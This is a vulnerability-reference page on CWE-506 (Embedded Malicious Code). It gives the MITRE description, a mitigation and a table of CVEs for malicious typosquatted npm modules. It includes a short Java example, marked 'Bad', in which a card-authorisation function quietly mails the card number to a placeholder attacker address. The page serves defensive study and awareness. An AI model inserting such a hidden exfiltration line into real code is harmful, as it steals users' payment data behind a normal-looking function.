CWE-506 (Embedded Malicious Code) — Vulnerability Class (78 CVEs)

78 vulnerabilities classified as CWE-506 (Embedded Malicious Code). AI Chinese analysis included.

CWE-506 represents a critical integrity weakness where software contains intentionally embedded malicious code, often disguised as legitimate functionality. This flaw typically manifests as Trojan horses, trapdoors, or logic bombs, allowing developers or insiders to subvert system security at a predetermined time or under specific conditions. Exploitation occurs when the hidden code executes, granting unauthorized access, stealing data, or disrupting operations while the primary application appears to function normally. To mitigate this risk, organizations must enforce strict code review processes and utilize automated static analysis tools to detect suspicious patterns. Additionally, implementing robust access controls and maintaining transparent development practices ensure that no hidden backdoors remain in the final product, thereby preserving trust and preventing insider threats from compromising system integrity.

MITRE CWE Description
The product contains code that appears to be malicious in nature. Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of a product or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program's user in a way the user does not intend.
Common Consequences (1)
Scope: Confidentiality, Integrity, Availability. Technical impact: Execute Unauthorized Code or Commands.
Mitigations (1)
Phase: Implementation, Operation. Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.
Examples (1)
In the example below, a malicious developer has injected code to send credit card numbers to the developer's own email address.
    boolean authorizeCard(String ccn) {
        // Authorize credit card.
        ...
        // Hidden exfiltration: the card number is mailed to the developer's own address.
        mailCardNumber(ccn, "evil_developer@evil_domain.com");
    }
Bad · Java
CVE ID          Title                                                               CVSS  Severity  Published
CVE-2017-16074  crossenv security vulnerability — crossenv node module              7.5   -         2018-06-07
CVE-2017-16073  noderequest security vulnerability — noderequest node module        7.5   -         2018-06-07
CVE-2017-16072  nodemailer.js security vulnerability — nodemailer.js node module    7.5   -         2018-06-07
CVE-2017-16070  nodecaffe security vulnerability — nodecaffe node module            7.5   -         2018-06-07
CVE-2017-16045  jquery.js security vulnerability — jquery.js node module            7.5   -         2018-06-04
CVE-2017-16046  MariaDB information disclosure vulnerability — mariadb node module  7.5   -         2018-06-04
CVE-2017-16048  node-sqlite security vulnerability — node-sqlite node module        7.5   -         2018-06-04
CVE-2017-16049  nodesqlite security vulnerability — nodesqlite node module          7.5   -         2018-06-04
CVE-2017-16050  sqlite.js security vulnerability — sqlite.js node module            7.5   -         2018-06-04
CVE-2017-16051  sqliter security vulnerability — sqliter node module                7.5   -         2018-06-04
CVE-2017-16052  node-fabric security vulnerability — node-fabric node module        7.5   -         2018-06-04
CVE-2017-16053  fabric-js security vulnerability — fabric-js node module            7.5   -         2018-06-04
CVE-2017-16054  nodefabric security vulnerability — nodefabric node module          7.5   -         2018-06-04
CVE-2017-16055  sqlserver security vulnerability — sqlserver node module            7.5   -         2018-06-04
CVE-2017-16044  d3.js security vulnerability — d3.js node module                    7.5   -         2018-06-04
CVE-2017-16047  mysqljs security vulnerability — mysqljs node module                7.5   -         2018-05-29
CVE-2017-16061  tkinter security vulnerability — tkinter node module                7.5   -         2018-05-29
CVE-2017-16062  node-tkinter security vulnerability — node-tkinter node module      7.5   -         2018-05-29

Vulnerabilities classified as CWE-506 (Embedded Malicious Code) represent 78 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.